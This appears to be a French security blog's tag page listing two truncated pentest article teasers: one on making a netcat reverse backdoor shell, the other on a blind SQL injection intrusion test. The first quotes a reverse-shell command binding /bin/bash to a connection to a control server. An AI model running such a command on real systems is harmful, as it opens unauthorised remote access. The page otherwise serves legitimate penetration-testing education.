Articles taggés ‘pentest’
Netcat et « -e invalid option »
Il est souvent très utile de créer un reverse backdoor shell sur un serveur qui n'est pas accessible directement (par exemple derrière un firewall). C'est alors ce serveur qui lance une connexion sortante vers notre serveur de contrôle. Or sur certaines distributions (dont Ubuntu, Mint,etc..) netcat (ou "nc") ne dispose pas de l'option "-e" qui permet de lui attacher un shell (ou autre). On obtient alors ce message d'erreur : #nc master_srv 1234 -e /bin/bash nc: invalid option ...
Test d’intrusion et Blind SQL Injection
Cet article présente un extrait issu d’un test d’intrusion pratiqué par notre équipe sécurité. A partir de vulnérabilités découvertes sur un site Apache, qui peuvent paraître inoffensives à première vue, nous allons voir comment un hacker va en prendre possession et lui faire exécuter du code arbitraire. Nous démontrerons ainsi les conséquences qu’engendre une mauvaise configuration de serveur web sous linux, le risque restant équivalent pour tout autre système d’exploitation. Nous terminerons ensuite par une mesure ...